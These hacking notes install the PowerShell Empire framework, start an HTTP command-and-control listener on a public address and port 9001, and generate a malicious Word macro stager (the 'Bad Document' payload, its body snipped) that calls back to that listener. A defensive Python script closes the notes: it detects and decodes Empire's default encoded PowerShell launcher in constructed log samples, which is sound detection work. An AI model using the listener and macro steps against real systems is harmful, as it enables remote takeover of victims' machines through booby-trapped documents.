Prerequisites
Install pip3 (Python package installer)
sudo apt install python3-pip -y
Install Poetry
sudo pip3 install poetry
Install Git
sudo apt install git -y
Install PowerShell Empire
git clone --recursive https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire
Hacking
Generate an HTTP listener
(Empire) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
  Name      Required  Value                           Description
  ----      --------  -------                         -----------
  Name      True      http                            Name for the listener.
  Host      True      http://10.128.0.15              Hostname/IP for staging.
  BindIP    True      0.0.0.0                         The IP to bind to on the control server.
  Port      True                                      Port for the listener.
  Launcher  True      powershell -noP -sta -w 1 -enc  Launcher string.
[snip]
Change the Host IP and the Port:
(Empire: listeners/http) > set Host 34.xx.xx.xx
(Empire: listeners/http) > set Port 9001
Finally, run execute to start listening:
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
Payload (Macro for Bad Document)
(Empire) > usestager windows/macro
(Empire: stager/windows/macro) > info
Name: Macro
...[snip]...
Options:
  Name           Required  Value       Description
  ----           --------  -------     -----------
  Listener       True                  Listener to generate stager for.
  Language       True      powershell  Language of the stager to generate.
  StagerRetries  False     0           Times for the stager to retry connecting.
  OutFile        False                 File to output launcher to, otherwise displayed on the screen
... [snip] ...
Set the Listener value to the listener created above:
(Empire: stager/windows/macro) > set Listener http
(Empire: stager/windows/macro) > execute
Sub AutoClose()
db
End Sub
Public Function db() As Variant
[snip]
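From the defender's side, what the listener's default Launcher and the macro stager leave behind on an endpoint is a PowerShell process started with the abbreviated switches `-noP -sta -w 1 -enc <base64>`. The script below is an added example, not part of these notes or of Empire: it resolves those abbreviated switches to their full PowerShell parameter names (PowerShell accepts any unambiguous prefix), flags the exact default combination shown in the listener options, and decodes the `-EncodedCommand` argument (base64 of UTF-16LE text) so an analyst can read it. The log format and the sample lines are constructed for the example.

```python
import base64
import binascii
import re
import shlex

# Full parameter names that the abbreviated switches on this page expand to.
CANONICAL = ["-noprofile", "-sta", "-windowstyle", "-encodedcommand",
             "-noninteractive", "-executionpolicy", "-file", "-command"]
# The Empire default launcher from the listener options: -noP -sta -w 1 -enc
EMPIRE_DEFAULT = {"-noprofile", "-sta", "-windowstyle", "-encodedcommand"}

def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument as PowerShell expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def canonical_flag(token: str):
    """Resolve an abbreviated switch to its full name; None if unknown or ambiguous."""
    matches = [c for c in CANONICAL if c.startswith(token.lower())]
    return matches[0] if len(matches) == 1 else None

def analyze_command_line(cmdline: str) -> dict:
    """Collect launcher switches and decode the -EncodedCommand payload if present."""
    tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    flags, decoded = set(), None
    for i, tok in enumerate(tokens):
        name = canonical_flag(tok) if tok.startswith("-") else None
        if name is None:
            continue
        flags.add(name)
        if name == "-encodedcommand" and i + 1 < len(tokens):
            try:
                decoded = base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                decoded = None  # malformed payload: still flagged, just not readable
    return {"image": tokens[0] if tokens else "", "flags": sorted(flags),
            "decoded": decoded, "empire_default": EMPIRE_DEFAULT <= flags}

def scan_process_logs(lines):
    """Extract the CommandLine field from each constructed log line and analyze it."""
    return [analyze_command_line(m.group(1))
            for m in (re.search(r"CommandLine: (.*)$", ln) for ln in lines) if m]

# Constructed sample log lines (not real telemetry); the first mirrors the page's
# default launcher but carries a harmless encoded command.
SAMPLE_LOGS = [
    "2024-05-01T10:00:00Z WKSTN01 EventID=4688 CommandLine: powershell -noP -sta -w 1 -enc "
    + encode_ps("Write-Output 'constructed benign sample'"),
    "2024-05-01T10:00:05Z WKSTN01 EventID=4688 CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "2024-05-01T10:00:09Z WKSTN02 EventID=4688 CommandLine: powershell -enc not*base64*",
]

if __name__ == "__main__":
    for result in scan_process_logs(SAMPLE_LOGS):
        print(result)
```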